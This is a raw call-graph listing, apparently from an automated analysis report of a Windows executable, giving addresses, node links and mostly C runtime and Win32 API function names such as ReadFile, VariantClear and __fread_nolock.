__mbsnbicoll_l 10 API calls 77280->77281 77281->77278 77282->77254 77283->77257 77285 414c82 __tzset_nolock 77284->77285 77286 414cc3 77285->77286 77287 414c96 __gmtime64_s 77285->77287 77289 414cbb __tzset_nolock 77285->77289 77288 415471 __lock_file 47 API calls 77286->77288 77311 417f77 46 API calls __getptd_noexit 77287->77311 77290 414ccb 77288->77290 77289->76931 77297 414aba 77290->77297 77293 414cb0 77312 417f25 10 API calls __mbsnbicoll_l 77293->77312 77300 414ad8 __gmtime64_s 77297->77300 77302 414af2 77297->77302 77298 414ae2 77364 417f77 46 API calls __getptd_noexit 77298->77364 77300->77298 77300->77302 77305 414b2d 77300->77305 77313 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 77302->77313 77304 414c38 __gmtime64_s 77367 417f77 46 API calls __getptd_noexit 77304->77367 77305->77302 77305->77304 77306 414139 __fclose_nolock 46 API calls 77305->77306 77314 41dfcc 77305->77314 77344 41d8f3 77305->77344 77366 41e0c2 46 API calls 3 library calls 77305->77366 77306->77305 77310 414ae7 77365 417f25 10 API calls __mbsnbicoll_l 77310->77365 77311->77293 77312->77289 77313->77289 77315 41dfd8 __tzset_nolock 77314->77315 77316 41dfe0 77315->77316 77319 41dffb 77315->77319 77437 417f8a 46 API calls __getptd_noexit 77316->77437 77317 41e007 77439 417f8a 46 API calls __getptd_noexit 77317->77439 77319->77317 77323 41e041 77319->77323 77321 41dfe5 77438 417f77 46 API calls __getptd_noexit 77321->77438 77322 41e00c 77440 417f77 46 API calls __getptd_noexit 77322->77440 77326 41e063 77323->77326 77327 41e04e 77323->77327 77328 41ae56 ___lock_fhandle 48 API calls 77326->77328 77442 417f8a 46 API calls __getptd_noexit 77327->77442 77331 41e069 77328->77331 77329 41e014 77441 417f25 10 API calls __mbsnbicoll_l 77329->77441 77334 41e077 77331->77334 77335 41e08b 77331->77335 77332 41e053 77443 417f77 46 API calls __getptd_noexit 77332->77443 77368 41da15 77334->77368 77444 417f77 46 API calls __getptd_noexit 77335->77444 77337 41dfed __tzset_nolock 77337->77305 77340 41e083 77446 41e0ba LeaveCriticalSection __unlock_fhandle 77340->77446 77341 41e090 77445 417f8a 46 API calls __getptd_noexit 77341->77445 77345 41d900 77344->77345 77349 41d915 77344->77349 77450 417f77 46 API calls __getptd_noexit 77345->77450 77347 41d905 77451 417f25 10 API calls __mbsnbicoll_l 77347->77451 77350 41d94a 77349->77350 77356 41d910 77349->77356 77447 420603 77349->77447 77352 414139 __fclose_nolock 46 API calls 77350->77352 77353 41d95e 77352->77353 77354 41dfcc __read 59 API calls 77353->77354 77355 41d965 77354->77355 77355->77356 77357 414139 __fclose_nolock 46 API calls 77355->77357 77356->77305 77358 41d988 77357->77358 77358->77356 77359 414139 __fclose_nolock 46 API calls 77358->77359 77360 41d994 77359->77360 77360->77356 77361 414139 __fclose_nolock 46 API calls 77360->77361 77362 41d9a1 77361->77362 77363 414139 __fclose_nolock 46 API calls 77362->77363 77363->77356 77364->77310 77365->77302 77366->77305 77367->77310 77369 41da31 77368->77369 77370 41da4c 77368->77370 77371 417f8a __write_nolock 46 API calls 77369->77371 77372 41da5b 77370->77372 77374 41da7a 77370->77374 77373 41da36 77371->77373 77375 417f8a __write_nolock 46 API calls 77372->77375 77376 417f77 __mbsnbicoll_l 46 API calls 77373->77376 77378 41da98 77374->77378 77390 41daac 77374->77390 77377 41da60 77375->77377 77391 41da3e 77376->77391 77380 417f77 __mbsnbicoll_l 46 API calls 77377->77380 77381 417f8a __write_nolock 46 API calls 77378->77381 77379 41db02 77384 417f8a __write_nolock 46 API calls 77379->77384 77383 41da67 77380->77383 77382 41da9d 77381->77382 77385 417f77 __mbsnbicoll_l 46 API calls 77382->77385 77386 417f25 __mbsnbicoll_l 10 API calls 77383->77386 77387 41db07 77384->77387 77389 41daa4 77385->77389 77386->77391 77388 417f77 __mbsnbicoll_l 46 API calls 77387->77388 77388->77389 77393 417f25 __mbsnbicoll_l 10 API calls 77389->77393 77390->77379 77390->77391 77392 41dae1 77390->77392 77394 41db1b 77390->77394 77391->77340 77392->77379 77397 41daec ReadFile 77392->77397 77393->77391 77396 416b04 __malloc_crt 46 API calls 77394->77396 77398 41db31 77396->77398 77399 41dc17 77397->77399 77400 41df8f GetLastError 77397->77400 77403 41db59 77398->77403 77404 41db3b 77398->77404 77399->77400 77405 41dc2b 77399->77405 77401 41de16 77400->77401 77402 41df9c 77400->77402 77412 417f9d __dosmaperr 46 API calls 77401->77412 77416 41dd9b 77401->77416 77407 417f77 __mbsnbicoll_l 46 API calls 77402->77407 77406 420494 __lseeki64_nolock 48 API calls 77403->77406 77408 417f77 __mbsnbicoll_l 46 API calls 77404->77408 77405->77416 77417 41dc47 77405->77417 77420 41de5b 77405->77420 77409 41db67 77406->77409 77410 41dfa1 77407->77410 77411 41db40 77408->77411 77409->77397 77413 417f8a __write_nolock 46 API calls 77410->77413 77414 417f8a __write_nolock 46 API calls 77411->77414 77412->77416 77413->77416 77414->77391 77415 413748 _free 46 API calls 77415->77391 77416->77391 77416->77415 77418 41dcab ReadFile 77417->77418 77427 41dd28 77417->77427 77421 41dcd3 77418->77421 77422 41dcc9 GetLastError 77418->77422 77419 41ded0 ReadFile 77423 41deef GetLastError 77419->77423 77435 41def9 77419->77435 77420->77416 77420->77419 77421->77417 77432 420494 __lseeki64_nolock 48 API calls 77421->77432 77422->77417 77422->77421 77423->77420 77423->77435 77424 41ddec MultiByteToWideChar 77424->77416 77425 41de10 GetLastError 77424->77425 77425->77401 77426 41dd96 77428 417f77 __mbsnbicoll_l 46 API calls 77426->77428 77427->77416 77427->77426 77429 41dda3 77427->77429 77430 41dd60 77427->77430 77428->77416 77429->77430 77431 41ddda 77429->77431 77430->77424 77434 420494 __lseeki64_nolock 48 API calls 77431->77434 77432->77421 77433 420494 __lseeki64_nolock 48 API calls 77433->77435 77436 41dde9 77434->77436 77435->77420 77435->77433 77436->77424 77437->77321 77438->77337 77439->77322 77440->77329 77441->77337 77442->77332 77443->77329 77444->77341 77445->77340 77446->77337 77448 416b04 __malloc_crt 46 API calls 77447->77448 77449 420618 77448->77449 77449->77350 77450->77347 77451->77356 77455 4148b3 GetSystemTimeAsFileTime __aulldiv 77452->77455 77454 442c6b 77454->76934 77455->77454 77456->76942 77457->76947 77458->76947 77464 45272f __tzset_nolock _wcscpy 77459->77464 77460 44afef GetSystemTimeAsFileTime 77460->77464 77461 414d04 61 API calls __fread_nolock 77461->77464 77462 4528a4 77462->76856 77462->76857 77463 4150d1 81 API calls _fseek 77463->77464 77464->77460 77464->77461 77464->77462 77464->77463 77466 44b1bc 77465->77466 77467 44b1ca 77465->77467 77468 4149c2 116 API calls 77466->77468 77469 44b1e1 77467->77469 77470 4149c2 116 API calls 77467->77470 77471 44b1d8 77467->77471 77468->77467 77500 4321a4 77469->77500 77472 44b2db 77470->77472 77471->76884 77472->77469 77474 44b2e9 77472->77474 77476 44b2f6 77474->77476 77480 414a46 __fcloseall 82 API calls 77474->77480 77475 44b224 77477 44b253 77475->77477 77478 44b228 77475->77478 77476->76884 77504 43213d 77477->77504 77479 44b235 77478->77479 77482 414a46 __fcloseall 82 API calls 77478->77482 77483 44b245 77479->77483 77485 414a46 __fcloseall 82 API calls 77479->77485 77480->77476 77482->77479 77483->76884 77484 44b25a 77486 44b260 77484->77486 77487 44b289 77484->77487 77485->77483 77489 44b26d 77486->77489 77492 414a46 __fcloseall 82 API calls 77486->77492 77514 44b0bf 77487->77514 77490 44b27d 77489->77490 77493 414a46 __fcloseall 82 API calls 77489->77493 77490->76884 77491 44b28f 77523 4320f8 77491->77523 77492->77489 77493->77490 77496 44b2a2 77498 44b2b2 77496->77498 77499 414a46 __fcloseall 82 API calls 77496->77499 77497 414a46 __fcloseall 82 API calls 77497->77496 77498->76884 77499->77498 77501 4321cb 77500->77501 77503 4321b4 __tzset_nolock _memmove 77500->77503 77502 414d04 __fread_nolock 61 API calls 77501->77502 77502->77503 77503->77475 77505 4135bb _malloc 46 API calls 77504->77505 77506 432150 77505->77506 77507 4135bb _malloc 46 API calls 77506->77507 77508 432162 77507->77508 77509 4135bb _malloc 46 API calls 77508->77509 77510 432174 77509->77510 77511 4320f8 46 API calls 77510->77511 77512 432189 77510->77512 77513 432198 77511->77513 77512->77484 77513->77484 77515 44b18e 77514->77515 77519 44b0da 77514->77519 77535 43206e 77515->77535 77517 442caf 61 API calls 77517->77519 77519->77515 77519->77517 77522 44b19d 77519->77522 77531 442d48 77519->77531 77539 44b040 61 API calls 77519->77539 77522->77491 77524 43210f 77523->77524 77525 432109 77523->77525 77527 432122 77524->77527 77528 413748 _free 46 API calls 77524->77528 77526 413748 _free 46 API calls 77525->77526 77526->77524 77529 432135 77527->77529 77530 413748 _free 46 API calls 77527->77530 77528->77527 77529->77496 77529->77497 77530->77529 77532 442dbd 77531->77532 77533 442d60 77531->77533 77532->77533 77540 4320a4 77532->77540 77533->77519 77536 432092 77535->77536 77537 43207f 77535->77537 77536->77491 77538 4142b6 79 API calls 77537->77538 77538->77536 77539->77519 77541 4320e6 77540->77541 77542 4320cf 77540->77542 77541->77532 77544 4142b6 77542->77544 77545 4142c2 __tzset_nolock 77544->77545 77546 4142f2 77545->77546 77547 4142da 77545->77547 77548 4142ea __tzset_nolock 77545->77548 77549 415471 __lock_file 47 API calls 77546->77549 77550 417f77 __mbsnbicoll_l 46 API calls 77547->77550 77548->77541 77551 4142fa 77549->77551 77552 4142df 77550->77552 77553 41415f 77 API calls 77551->77553 77554 417f25 __mbsnbicoll_l 10 API calls 77552->77554 77555 41430f 77553->77555 77554->77548 77556 414326 LeaveCriticalSection LeaveCriticalSection 77555->77556 77556->77548 77557->76802 77558->76802 77559->76802 77560->76793 77561->76802 77562->76802 77563->76806 77564->76815 77565->76817 77566->76817 77567->76821 77568->76830 77569->76824 77619 410160 77570->77619 77572 41012f GetFullPathNameW 77573 410147 moneypunct 77572->77573 77573->76659 77575 4102cb SHGetDesktopFolder 77574->77575 77578 410333 _wcsncpy 77574->77578 77576 4102e0 _wcsncpy 77575->77576 77575->77578 77577 41031c SHGetPathFromIDListW 77576->77577 77576->77578 77577->77578 77578->76662 77580 4101bb 77579->77580 77585 425f4a 77579->77585 77581 410160 52 API calls 77580->77581 77582 4101c7 77581->77582 77623 410200 52 API calls 2 library calls 77582->77623 77583 4114ab __wcsicoll 58 API calls 77583->77585 77585->77583 77587 425f6e 77585->77587 77586 4101d6 77624 410200 52 API calls 2 library calls 77586->77624 77587->76664 77589 4101e9 77589->76664 77591 40f760 128 API calls 77590->77591 77592 40f584 77591->77592 77593 429335 77592->77593 77594 40f58c 77592->77594 77597 4528bd 118 API calls 77593->77597 77595 40f598 77594->77595 77596 429358 77594->77596 77625 4033c0 113 API calls 7 library calls 77595->77625 77626 434034 86 API calls _wprintf 77596->77626 77599 42934b 77597->77599 77602 429373 77599->77602 77603 42934f 77599->77603 77601 40f5b4 77601->76660 77605 4115d7 52 API calls 77602->77605 77606 431e58 82 API calls 77603->77606 77604 429369 77604->77602 77611 4293c5 moneypunct 77605->77611 77606->77596 77607 42959c 77608 413748 _free 46 API calls 77607->77608 77609 4295a5 77608->77609 77610 431e58 82 API calls 77609->77610 77612 4295b1 77610->77612 77611->77607 77616 401b10 52 API calls 77611->77616 77627 444af8 52 API calls _memmove 77611->77627 77628 44c7dd 64 API calls 3 library calls 77611->77628 77629 44b41c 52 API calls 77611->77629 77630 402780 52 API calls 2 library calls 77611->77630 77631 4022d0 52 API calls moneypunct 77611->77631 77616->77611 77620 410167 _wcslen 77619->77620 77621 4115d7 52 API calls 77620->77621 77622 41017e _wcscpy 77621->77622 77622->77572 77623->77586 77624->77589 77625->77601 77626->77604 77627->77611 77628->77611 77629->77611 77630->77611 77631->77611 77633 402539 moneypunct 77632->77633 77634 402417 77632->77634 77633->76668 77634->77633 77635 4115d7 52 API calls 77634->77635 77636 402443 77635->77636 77637 4115d7 52 API calls 77636->77637 77638 4024b4 77637->77638 77638->77633 77661 402880 77638->77661 77703 4022d0 52 API calls moneypunct 77638->77703 77645 401566 77641->77645 77642 401794 77719 40e9a0 90 API calls 77642->77719 77645->77642 77646 4010a0 52 API calls 77645->77646 77647 40167a 77645->77647 77646->77645 77648 4017c0 77647->77648 77720 45e737 90 API calls 3 library calls 77647->77720 77648->76670 77650 40bc70 52 API calls 77649->77650 77651 40d451 77650->77651 77652 40d50f 77651->77652 77654 40e0a0 52 API calls 77651->77654 77655 427c01 77651->77655 77657 401b10 52 API calls 77651->77657 77658 40d519 77651->77658 77721 40f310 53 API calls 77651->77721 77722 40d860 91 API calls 77651->77722 77723 410600 52 API calls 77652->77723 77654->77651 77724 45e737 90 API calls 3 library calls 77655->77724 77657->77651 77658->76673 77662 4115d7 52 API calls 77661->77662 77663 4028b3 77662->77663 77664 4115d7 52 API calls 77663->77664 77683 4028c5 moneypunct _memmove 77664->77683 77666 402b1e moneypunct 77666->77638 77667 427d62 77669 403350 52 API calls 77667->77669 77679 427d6b 77669->77679 77670 402bb6 77707 403060 53 API calls 77670->77707 77671 402aeb moneypunct 77677 42802b moneypunct 77671->77677 77706 402780 52 API calls 2 library calls 77671->77706 77673 402bca 77674 427f63 77673->77674 77675 402bd4 77673->77675 77714 460879 92 API calls 3 library calls 77674->77714 77708 402780 52 API calls 2 library calls 77675->77708 77676 403350 52 API calls 77676->77683 77702 427f2c 77679->77702 77711 403020 52 API calls _memmove 77679->77711 77681 402bdf 77681->77638 77683->77667 77683->77670 77683->77671 77683->77676 77685 427fd5 77683->77685 77686 402780 52 API calls 77683->77686 77692 427fa5 77683->77692 77693 402f00 52 API calls 77683->77693 77694 428000 77683->77694 77701 4115d7 52 API calls 77683->77701 77683->77702 77704 4031b0 63 API calls 77683->77704 77705 4026f0 52 API calls _memmove 77683->77705 77709 402f80 92 API calls _memmove 77683->77709 77710 402280 52 API calls 77683->77710 77712 4013a0 52 API calls 77683->77712 77716 460879 92 API calls 3 library calls 77685->77716 77686->77683 77687 427f48 77687->77666 77691 427fe4 77717 402780 52 API calls 2 library calls 77691->77717 77715 402780 52 API calls 2 library calls 77692->77715 77693->77683 77718 460879 92 API calls 3 library calls 77694->77718 77700 402a85 CharUpperBuffW 77700->77683 77701->77683 77713 460879 92 API calls 3 library calls 77702->77713 77703->77638 77704->77683 77705->77700 77706->77666 77707->77673 77708->77681 77709->77683 77710->77683 77711->77679 77712->77683 77713->77687 77714->77687 77715->77666 77716->77691 77717->77687 77718->77666 77719->77647 77720->77648 77721->77651 77722->77651 77723->77658 77724->77658 77725->76686 77726->76687 77728 42c5fe 77727->77728 77742 4091c6 77727->77742 77729 40bc70 52 API calls 77728->77729 77728->77742 77730 42c64e InterlockedIncrement 77729->77730 77731 42c665 77730->77731 77735 42c697 77730->77735 77733 42c672 InterlockedDecrement Sleep InterlockedIncrement 77731->77733 77731->77735 77732 42c737 InterlockedDecrement 77734 42c74a 77732->77734 77733->77731 77733->77735 77736 408f40 VariantClear 77734->77736 77735->77732 77757 42c731 77735->77757 78011 408e80 VariantClear 77735->78011 77738 42c752 77736->77738 78021 410c60 VariantClear moneypunct 77738->78021 77739 42c6cf 78012 45340c 77739->78012 77742->76749 77743 42c6db 77744 402160 52 API calls 77743->77744 77745 42c6e5 77744->77745 77746 45340c 85 API calls 77745->77746 77747 42c6f1 77746->77747 78018 40d200 52 API calls 2 library calls 77747->78018 77749 42c6fb 78019 465124 53 API calls 77749->78019 77751 42c715 77752 42c76a 77751->77752 77753 42c719 77751->77753 77754 401b10 52 API calls 77752->77754 78020 46fe32 VariantClear 77753->78020 77756 42c77e 77754->77756 77758 401980 53 API calls 77756->77758 77757->77732 77764 42c796 77758->77764 77759 42c812 78028 46fe32 VariantClear 77759->78028 77761 42c82a InterlockedDecrement 78029 46ff07 54 API calls 77761->78029 77763 42c864 78030 45e737 90 API calls 3 library calls 77763->78030 77764->77759 77764->77763 78022 40ba10 77764->78022 77766 42c9ec 78073 47d33e 398 API calls 77766->78073 77772 408f40 VariantClear 77781 42c849 77772->77781 77774 408f40 VariantClear 77777 42c891 77774->77777 77775 402780 52 API calls 77775->77781 78031 410c60 VariantClear moneypunct 77777->78031 77780 401980 53 API calls 77780->77781 77781->77766 77781->77772 77781->77775 77781->77780 78032 40a780 77781->78032 77782 42c874 77782->77774 77784 42ca59 77782->77784 77784->77784 77786 40afc4 77785->77786 77787 40b156 77785->77787 77788 40afd5 77786->77788 77789 42d1e3 77786->77789 78085 45e737 90 API calls 3 library calls 77787->78085 77793 40a780 259 API calls 77788->77793 77810 40b11a moneypunct 77788->77810 78086 45e737 90 API calls 3 library calls 77789->78086 77792 42d1f8 77798 408f40 VariantClear 77792->77798 77796 40b00a 77793->77796 77794 40b143 77794->76749 77796->77792 77799 40b012 77796->77799 77797 42d4db 77797->77797 77798->77794 77800 40b04a 77799->77800 77801 42d231 VariantClear 77799->77801 77802 40b094 moneypunct 77799->77802 77804 40b05c moneypunct 77800->77804 78087 40e270 VariantClear moneypunct 77800->78087 77801->77804 77803 40b108 77802->77803 77806 42d425 moneypunct 77802->77806 77803->77810 78088 40e270 VariantClear moneypunct 77803->78088 77804->77802 77808 4115d7 52 API calls 77804->77808 77805 42d45a VariantClear 77805->77810 77806->77805 77806->77810 77808->77802 77810->77794 78089 45e737 90 API calls 3 library calls 77810->78089 77812 408fff 77811->77812 77815 40900d 77811->77815 78090 403ea0 52 API calls __cinit 77812->78090 77816 42c3f6 77815->77816 77818 42c44a 77815->77818 77819 40a780 259 API calls 77815->77819 77820 42c47b 77815->77820 77823 42c564 77815->77823 77825 42c4cb 77815->77825 77827 42c548 77815->77827 77831 409112 77815->77831 77833 4090df 77815->77833 77835 42c528 77815->77835 77837 4090ea 77815->77837 77845 4090f2 moneypunct 77815->77845 78093 4534e3 52 API calls 77815->78093 78095 40c4e0 259 API calls 77815->78095 78094 45e737 90 API calls 3 library calls 77816->78094 78096 45e737 90 API calls 3 library calls 77818->78096 77819->77815 78097 451b42 61 API calls 77820->78097 77828 408f40 VariantClear 77823->77828 78099 47faae 298 API calls 77825->78099 78102 45e737 90 API calls 3 library calls 77827->78102 77828->77845 77829 42c491 77829->77845 78098 45e737 90 API calls 3 library calls 77829->78098 77830 42c4da 77830->77845 78100 45e737 90 API calls 3 library calls 77830->78100 77831->77827 77840 40912b 77831->77840 77833->77837 78091 408e80 VariantClear 77833->78091 78101 45e737 90 API calls 3 library calls 77835->78101 77841 408f40 VariantClear 77837->77841 77840->77845 78092 403e10 53 API calls 77840->78092 77841->77845 77843 40914b 77844 408f40 VariantClear 77843->77844 77844->77845 77845->76749 78103 408d90 77846->78103 77848 429778 78132 410c60 VariantClear moneypunct 77848->78132 77850 408cf9 77850->77848 77852 42976c 77850->77852 77854 408d2d 77850->77854 77851 429780 78131 45e737 90 API calls 3 library calls 77852->78131 78119 403d10 77854->78119 77857 408d71 moneypunct 77857->76749 77858 408d45 moneypunct 77858->77857 77859 408f40 VariantClear 77858->77859 77859->77858 77861 4096c6 _wcslen 77860->77861 77862 4115d7 52 API calls 77861->77862 77924 40a70c moneypunct _memmove 77861->77924 77863 4096fa _memmove 77862->77863 77865 4115d7 52 API calls 77863->77865 77867 40971b 77865->77867 77866 4297aa 77868 4115d7 52 API calls 77866->77868 77869 409749 CharUpperBuffW 77867->77869 77871 40976a moneypunct 77867->77871 77867->77924 77911 4297d1 _memmove 77868->77911 77869->77871 77920 4097e5 moneypunct 77871->77920 78652 47dcbb 261 API calls 77871->78652 77873 408f40 VariantClear 77874 42ae92 77873->77874 78680 410c60 VariantClear moneypunct 77874->78680 77876 42aea4 77877 409aa2 77879 4115d7 52 API calls 77877->77879 77884 409afe 77877->77884 77877->77911 77878 40a689 77881 4115d7 52 API calls 77878->77881 77879->77884 77880 4115d7 52 API calls 77880->77920 77898 40a6af moneypunct _memmove 77881->77898 77882 409b2a 77886 429dbe 77882->77886 77931 409b4d moneypunct _memmove 77882->77931 78659 40b400 VariantClear VariantClear moneypunct 77882->78659 77883 40c2c0 52 API calls 77883->77920 77884->77882 77885 4115d7 52 API calls 77884->77885 77887 429d31 77885->77887 77890 429dd3 77886->77890 78660 40b400 VariantClear VariantClear moneypunct 77886->78660 77889 429d42 77887->77889 78656 44a801 52 API calls 77887->78656 77902 40e0a0 52 API calls 77889->77902 77890->77931 78661 40e1c0 VariantClear moneypunct 77890->78661 77891 429a46 VariantClear 77891->77920 77892 408f40 VariantClear 77892->77920 77895 40a045 77900 4115d7 52 API calls 77895->77900 77896 42a3f5 78665 47390f VariantClear 77896->78665 77906 4115d7 52 API calls 77898->77906 77907 40a04c 77900->77907 77908 429d57 77902->77908 77903 40ba10 52 API calls 77903->77920 77904 42a42f 78666 45e737 90 API calls 3 library calls 77904->78666 77906->77924 77909 40a0a7 77907->77909 77913 4091e0 384 API calls 77907->77913 78657 453443 52 API calls 77908->78657 77934 40a0af 77909->77934 78667 40c790 VariantClear moneypunct 77909->78667 77910 4299d9 77914 408f40 VariantClear 77910->77914 78679 45e737 90 API calls 3 library calls 77911->78679 77913->77909 77919 4299e2 77914->77919 77915 429abd 77915->76749 77916 429d88 78658 453443 52 API calls 77916->78658 78654 410c60 VariantClear moneypunct 77919->78654 77920->77877 77920->77878 77920->77880 77920->77883 77920->77891 77920->77892 77920->77898 77920->77903 77920->77910 77920->77911 77920->77915 77922 42a452 77920->77922 77926 40a780 259 API calls 77920->77926 78653 40c4e0 259 API calls 77920->78653 78655 40e270 VariantClear moneypunct 77920->78655 77922->77873 78651 4013a0 52 API calls 77924->78651 77926->77920 77927 402780 52 API calls 77927->77931 77929 40a650 moneypunct 77929->76749 77930 408f40 VariantClear 77962 40a162 moneypunct _memmove 77930->77962 77931->77896 77931->77904 77931->77924 77931->77927 77932 4115d7 52 API calls 77931->77932 77933 41130a 51 API calls __cinit 77931->77933 77937 40a780 259 API calls 77931->77937 77939 401980 53 API calls 77931->77939 77945 44a801 52 API calls 77931->77945 77949 409fd2 77931->77949 77951 409c95 77931->77951 78662 45f508 52 API calls 77931->78662 78663 403e10 53 API calls 77931->78663 78664 408e80 VariantClear 77931->78664 77932->77931 77933->77931 77935 40a11b 77934->77935 77936 42a4b4 VariantClear 77934->77936 77934->77962 77942 40a12d moneypunct 77935->77942 78668 40e270 VariantClear moneypunct 77935->78668 77936->77942 77937->77931 77939->77931 77941 4115d7 52 API calls 77941->77962 77942->77941 77942->77962 77945->77931 77946 42a74d VariantClear 77946->77962 77947 40a368 77948 42aad4 77947->77948 77956 40a397 77947->77956 78672 46fe90 VariantClear VariantClear moneypunct 77948->78672 77949->77895 77949->77896 77950 42a7e4 VariantClear 77950->77962 77951->76749 77952 42a886 VariantClear 77952->77962 77954 40a3ce 77966 40a3d9 moneypunct 77954->77966 78673 40b400 VariantClear VariantClear moneypunct 77954->78673 77955 40e270 VariantClear 77955->77962 77956->77954 77981 40a42c moneypunct 77956->77981 78650 40b400 VariantClear VariantClear moneypunct 77956->78650 77959 4115d7 52 API calls 77959->77962 77960 42abaf 77965 42abd4 VariantClear 77960->77965 77974 40a4ee moneypunct 77960->77974 77961 4115d7 52 API calls 77964 42a5a6 VariantInit VariantCopy 77961->77964 77962->77930 77962->77946 77962->77947 77962->77948 77962->77950 77962->77952 77962->77955 77962->77959 77962->77961 78669 470870 52 API calls 77962->78669 78670 408e80 VariantClear 77962->78670 78671 44ccf1 VariantClear moneypunct 77962->78671 77963 40a4dc 77963->77974 78675 40e270 VariantClear moneypunct 77963->78675 77964->77962 77968 42a5c6 VariantClear 77964->77968 77965->77974 77967 40a41a 77966->77967 77973 42ab44 VariantClear 77966->77973 77966->77981 77967->77981 78674 40e270 VariantClear moneypunct 77967->78674 77968->77962 77969 42ac4f 77975 42ac79 VariantClear 77969->77975 77979 40a546 moneypunct 77969->77979 77972 40a534 77972->77979 78676 40e270 VariantClear moneypunct 77972->78676 77973->77981 77974->77969 77974->77972 77975->77979 77976 42ad28 77982 42ad4e VariantClear 77976->77982 77986 40a583 moneypunct 77976->77986 77979->77976 77980 40a571 77979->77980 77980->77986 78677 40e270 VariantClear moneypunct 77980->78677 77981->77960 77981->77963 77982->77986 77984 42ae0e VariantClear 77984->77986 77986->77929 77986->77984 78678 40e270 VariantClear moneypunct 77986->78678 77987->76749 77988->76749 77989->76749 77990->76697 77991->76702 77992->76749 77993->76749 77994->76749 77995->76749 77996->76754 77997->76754 77998->76754 77999->76754 78000->76754 78001->76754 78002->76754 78004 403cdf 78003->78004 78005 408f40 VariantClear 78004->78005 78006 403ce7 78005->78006 78006->76742 78007->76754 78008->76754 78009->76749 78010->76694 78011->77739 78013 453439 78012->78013 78014 453419 78012->78014 78013->77743 78015 45342f 78014->78015 78075 4531b1 85 API calls 5 library calls 78014->78075 78015->77743 78017 453425 78017->77743 78018->77749 78019->77751 78020->77757 78021->77742 78023 40ba49 78022->78023 78027 40ba1b moneypunct _memmove 78022->78027 78025 4115d7 52 API calls 78023->78025 78024 4115d7 52 API calls 78026 40ba22 78024->78026 78025->78027 78026->77764 78027->78024 78028->77761 78029->77781 78030->77782 78031->77742 78075->78017 78085->77789 78086->77792 78087->77804 78088->77810 78089->77797 78090->77815 78091->77837 78092->77843 78093->77815 78094->77845 78095->77815 78096->77845 78097->77829 78098->77845 78099->77830 78100->77845 78101->77845 78102->77823 78104 4289d2 78103->78104 78105 408db3 78103->78105 78137 45e737 90 API calls 3 library calls 78104->78137 78133 40bec0 78105->78133 78108 4289e5 78138 45e737 90 API calls 3 library calls 78108->78138 78109 408e5a 78109->77850 78111 40ba10 52 API calls 78113 408dc9 78111->78113 78112 428a05 78114 408f40 VariantClear 78112->78114 78113->78108 78113->78109 78113->78111 78113->78112 78115 40a780 259 API calls 78113->78115 78116 408e64 78113->78116 78118 408f40 VariantClear 78113->78118 78114->78109 78115->78113 78117 408f40 VariantClear 78116->78117 78117->78109 78118->78113 78120 408f40 VariantClear 78119->78120 78121 403d20 78120->78121 78122 403cd0 VariantClear 78121->78122 78123 403d4d 78122->78123 78140 475596 78123->78140 78143 46e1a6 78123->78143 78191 46f993 78123->78191 78230 4813fa 78123->78230 78240 4755ad 78123->78240 78243 467897 78123->78243 78124 403d76 78124->77848 78124->77858 78131->77848 78132->77851 78134 40bed0 78133->78134 78135 40bef2 78134->78135 78139 45e737 90 API calls 3 library calls 78134->78139 78135->78113 78137->78108 78138->78112 78139->78135 78287 475077 78140->78287 78142 4755a9 78142->78124 78144 46e1c0 78143->78144 78145 4533eb 85 API calls 78144->78145 78147 46e1dc 78145->78147 78146 46e483 78146->78124 78147->78146 78148 46e2e7 78147->78148 78149 46e1e9 78147->78149 78151 40f760 128 API calls 78148->78151 78150 45340c 85 API calls 78149->78150 78157 46e1f4 _wcscpy _wcschr 78150->78157 78152 46e2f7 78151->78152 78153 46e2fc 78152->78153 78154 46e30d 78152->78154 78155 403cd0 VariantClear 78153->78155 78156 45340c 85 API calls 78154->78156 78158 46e2c8 78155->78158 78159 46e332 78156->78159 78165 46e216 _wcscat _wcscpy 78157->78165 78169 46e248 _wcscat 78157->78169 78161 408f40 VariantClear 78158->78161 78160 413a0e __wsplitpath 46 API calls 78159->78160 78170 46e338 _wcscat _wcscpy 78160->78170 78162 46e2d0 78161->78162 78162->78124 78163 45340c 85 API calls 78164 46e264 _wcscpy 78163->78164 78496 433998 GetFileAttributesW 78164->78496 78167 45340c 85 API calls 78165->78167 78167->78169 78168 46e27d _wcslen 78168->78158 78171 45340c 85 API calls 78168->78171 78169->78163 78173 45340c 85 API calls 78170->78173 78172 46e2b0 78171->78172 78175 46e3e3 78173->78175 78192 40e710 53 API calls 78191->78192 78193 46f9ba 78192->78193 78194 4115d7 52 API calls 78193->78194 78201 46fa26 78193->78201 78195 46f9d3 78194->78195 78197 46f9df 78195->78197 78521 40da60 53 API calls 78195->78521 78196 46fa38 78196->78124 78199 4533eb 85 API calls 78197->78199 78200 46f9f0 78199->78200 78522 40de40 78200->78522 78201->78196 78205 46fa7a 78201->78205 78507 44c285 78201->78507 78206 46fb17 78205->78206 78207 46fa99 78205->78207 78209 40bc70 52 API calls 78206->78209 78208 4115d7 52 API calls 78207->78208 78213 46fa9f 78208->78213 78211 46fb20 78209->78211 78510 46ea94 78211->78510 78212 46fab6 78225 46faba moneypunct 78212->78225 78536 453132 53 API calls __gmtime64_s 78212->78536 78213->78212 78535 443ee5 ReadFile SetFilePointerEx 78213->78535 78218 46fb30 78218->78225 78537 40e6a0 53 API calls 78218->78537 78220 46faea _memmove 78223 403cd0 VariantClear 78220->78223 78222 46fb52 78223->78225 78226 46fb99 78225->78226 78538 40da20 78225->78538 78226->78124 78228 46fb8b 78542 44ae3e CloseHandle moneypunct 78228->78542 78231 45340c 85 API calls 78230->78231 78232 481438 78231->78232 78233 402880 95 API calls 78232->78233 78234 48143f 78233->78234 78235 481465 78234->78235 78236 40a780 259 API calls 78234->78236 78237 40e710 53 API calls 78235->78237 78238 481469 78235->78238 78236->78235 78239 4814a4 78237->78239 78238->78124 78239->78124 78241 475077 126 API calls 78240->78241 78242 4755c0 78241->78242 78242->78124 78244 4678bb 78243->78244 78246 45340c 85 API calls 78244->78246 78272 467954 78244->78272 78245 4115d7 52 API calls 78247 467989 78245->78247 78248 4678f6 78246->78248 78249 467995 78247->78249 78647 40da60 53 API calls 78247->78647 78250 413a0e __wsplitpath 46 API calls 78248->78250 78252 4533eb 85 API calls 78249->78252 78253 4678fc 78250->78253 78254 4679b7 78252->78254 78255 401b10 52 API calls 78253->78255 78256 40de40 60 API calls 78254->78256 78257 46790c 78255->78257 78258 4679c3 78256->78258 78645 40d200 52 API calls 2 library calls 78257->78645 78260 4679c7 GetLastError 78258->78260 78261 467a05 78258->78261 78263 403cd0 VariantClear 